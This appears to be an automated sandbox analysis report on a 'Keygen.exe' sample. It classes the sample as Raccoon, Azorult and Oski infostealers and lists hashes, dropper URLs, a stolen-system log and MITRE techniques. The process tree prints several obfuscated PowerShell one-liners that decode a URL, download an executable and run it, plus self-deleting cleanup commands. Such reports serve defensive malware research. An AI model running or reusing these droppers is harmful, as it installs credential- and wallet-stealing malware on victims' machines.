Overview

overview

10

Static

static

Keygen.exe

windows7_x64

Keygen.exe

windows10_x64

Resubmissions

14-03-2021 10:17

210314-fsh5gvfbqx 10

31-10-2020 16:07

201031-jhx64f88en 10

01-10-2020 20:46

201001-nyhbt4p25j 10

01-10-2020 20:45

201001-c3xkyk1ytn 10

01-10-2020 20:43

201001-j5wlprfb6a 10

23-09-2020 09:23

200923-31plnbj8kx 10

07-09-2020 15:39

200907-ttv28yxx3e 10

07-09-2020 15:39

200907-n38qzysfy6 10

07-09-2020 15:38

200907-9llegynkjx 10

07-09-2020 15:31

200907-3xqj79j9gx 10

Analysis

  • max time kernel
    82s
  • max time network
    79s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    23-09-2020 09:23

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    Keygen.exe

  • Size

    849KB

  • MD5

    dbde61502c5c0e17ebc6919f361c32b9

  • SHA1

    189749cf0b66a9f560b68861f98c22cdbcafc566

  • SHA256

    88cad5f9433e50af09ac9cad9db06e9003e85be739060b88b64186c05c0d636b

  • SHA512

    d9b8537f05844ec2f2549e2049e967a8023bfe432e3a9cf25fc0f7ad720e57a5830be733e1812cc806c5b68cd9586a031e394f67fc7e3f7fe390625fd5dedfbb

Score
10/10
ransomwarespywarediscoverystealerraccooninfostealeroskitrojanazorult

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT
exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe
exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe
exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv
exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD
exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe
exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:03 2020 Launched at: 2020.09.23 - 09:28:24 GMT Bot_ID: BAE8C589-5DA1-4C62-BE46-F8D74908CB8C_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: AVGLFESB - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (450 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

    trojaninfostealerazorult
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

    infostealeroski
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • Blacklisted process makes network request 6 IoCs
  • Executes dropped EXE 19 IoCs
  • Loads dropped DLL 45 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spyware
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Accesses cryptocurrency wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Drops desktop.ini file(s) 1 IoCs
  • JavaScript code in executable 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
    evasion
  • Kills process with taskkill 3 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
    adwarespyware
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 12 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 192 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Keygen.exe
    "C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1088
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\C40.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1048
      • C:\Users\Admin\AppData\Local\Temp\C40.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1512
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\C40.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1380
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blacklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1628
          • C:\Users\Public\jna.exe
            "C:\Users\Public\jna.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2680
            • C:\Users\Admin\AppData\Local\Temp\VjghertvcSD.exe
              "C:\Users\Admin\AppData\Local\Temp\VjghertvcSD.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2804
              • C:\Users\Admin\AppData\Local\Temp\VjghertvcSD.exe
                "C:\Users\Admin\AppData\Local\Temp\VjghertvcSD.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                PID:2136
            • C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe
              "C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2872
              • C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe
                "C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Checks processor information in registry
                PID:952
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 952 & erase C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe & RD /S /Q C:\\ProgramData\\954511868557547\\* & exit
                  8⤵
                    PID:2212
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 952
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:964
              • C:\Users\Public\jna.exe
                "C:\Users\Public\jna.exe"
                6⤵
                • Executes dropped EXE
                PID:2908
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\C40.tmp\m1.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1832
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1608
        • C:\Windows\SysWOW64\timeout.exe
          timeout 1
          3⤵
          • Delays execution with timeout.exe
          PID:1828
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\C40.tmp\b.hta"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:1604
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
            4⤵
            • Blacklisted process makes network request
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:812
            • C:\Users\Public\cuk.exe
              "C:\Users\Public\cuk.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2584
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Jwoasxr.vbs"
                6⤵
                • Loads dropped DLL
                PID:1520
                • C:\Users\Admin\AppData\Local\Temp\ooo.exe
                  "C:\Users\Admin\AppData\Local\Temp\ooo.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2496
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Gsgxeo.vbs"
                    8⤵
                    • Loads dropped DLL
                    PID:2888
                    • C:\Users\Admin\AppData\Local\Temp\aaa.exe
                      "C:\Users\Admin\AppData\Local\Temp\aaa.exe"
                      9⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2796
                      • C:\Users\Admin\AppData\Local\Temp\aaa.exe
                        "C:\Users\Admin\AppData\Local\Temp\aaa.exe"
                        10⤵
                        • Executes dropped EXE
                        PID:1520
                  • C:\Users\Admin\AppData\Local\Temp\ooo.exe
                    "C:\Users\Admin\AppData\Local\Temp\ooo.exe"
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Checks processor information in registry
                    PID:2820
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 2820 & erase C:\Users\Admin\AppData\Local\Temp\ooo.exe & RD /S /Q C:\\ProgramData\\014646040477042\\* & exit
                      9⤵
                        PID:2504
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /pid 2820
                          10⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1976
                • C:\Users\Public\cuk.exe
                  "C:\Users\Public\cuk.exe"
                  6⤵
                  • Executes dropped EXE
                  PID:2224
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\C40.tmp\b1.hta"
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:1860
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:788
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            3⤵
            • Delays execution with timeout.exe
            PID:1968
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\C40.tmp\ba.hta"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1200
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
              4⤵
              • Blacklisted process makes network request
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1484
              • C:\Users\Public\ita.exe
                "C:\Users\Public\ita.exe"
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2600
                • C:\Users\Admin\AppData\Local\Temp\VjghertvcSD.exe
                  "C:\Users\Admin\AppData\Local\Temp\VjghertvcSD.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:2700
                  • C:\Users\Admin\AppData\Local\Temp\VjghertvcSD.exe
                    "C:\Users\Admin\AppData\Local\Temp\VjghertvcSD.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    PID:2656
                • C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe
                  "C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe"
                  6⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: MapViewOfSection
                  • Suspicious use of SetWindowsHookEx
                  PID:2764
                  • C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe
                    "C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe"
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Checks processor information in registry
                    PID:2392
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c taskkill /pid 2392 & erase C:\Users\Admin\AppData\Local\Temp\IhfgetrDSqwe.exe & RD /S /Q C:\\ProgramData\\681051090122498\\* & exit
                      8⤵
                        PID:2124
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /pid 2392
                          9⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2584
                  • C:\Users\Public\ita.exe
                    "C:\Users\Public\ita.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Drops desktop.ini file(s)
                    • Modifies system certificate store
                    PID:2828
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\C40.tmp\ba1.hta"
              3⤵
              • Modifies Internet Explorer settings
              • Suspicious use of WriteProcessMemory
              PID:1092
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1692
        • C:\Windows\system32\LogonUI.exe
          "LogonUI.exe" /flags:0x0
          1⤵
            PID:396
          • C:\Windows\system32\LogonUI.exe
            "LogonUI.exe" /flags:0x1
            1⤵
              PID:1036

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Initial Access

            Execution

            Persistence

            Privilege Escalation

            Defense Evasion

            Modify Registry

            2
            T1112

            Install Root Certificate

            1
            T1130

            Credential Access

            Credentials in Files

            3
            T1081

            Discovery

            Query Registry

            2
            T1012

            System Information Discovery

            1
            T1082

            Lateral Movement

            Collection

            Data from Local System

            3
            T1005

            Exfiltration

            Command and Control

            Impact

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\ProgramData\MSVCP140.dll
              Download Submit
            • C:\ProgramData\VCRUNTIME140.dll
              Download Submit
            • C:\ProgramData\freebl3.dll
              Download Submit
            • C:\ProgramData\mozglue.dll
              Download Submit
            • C:\ProgramData\mozglue.dll
              Download Submit
            • C:\ProgramData\msvcp140.dll
              Download Submit
            • C:\ProgramData\nss3.dll
              Download Submit
            • C:\ProgramData\nss3.dll
              Download Submit
            • C:\ProgramData\softokn3.dll
              Download Submit
            • C:\ProgramData\softokn3.dll
              Download Submit
            • C:\ProgramData\softokn3.dll
              Download Submit
            • C:\ProgramData\sqlite3.dll
              Download Submit
            • C:\ProgramData\sqlite3.dll
              Download Submit
            • C:\ProgramData\vcruntime140.dll
              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa
              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533
              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba
              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8
              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9e0db28d-3b02-49ea-badb-2b63a914f81a
              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a0e2cbb4-ee36-40e3-9144-2cf1e4063f63
              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_de4eedb8-4762-4c56-b80c-203df3aa6fa8
              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360
              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e
              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
              Download Submit
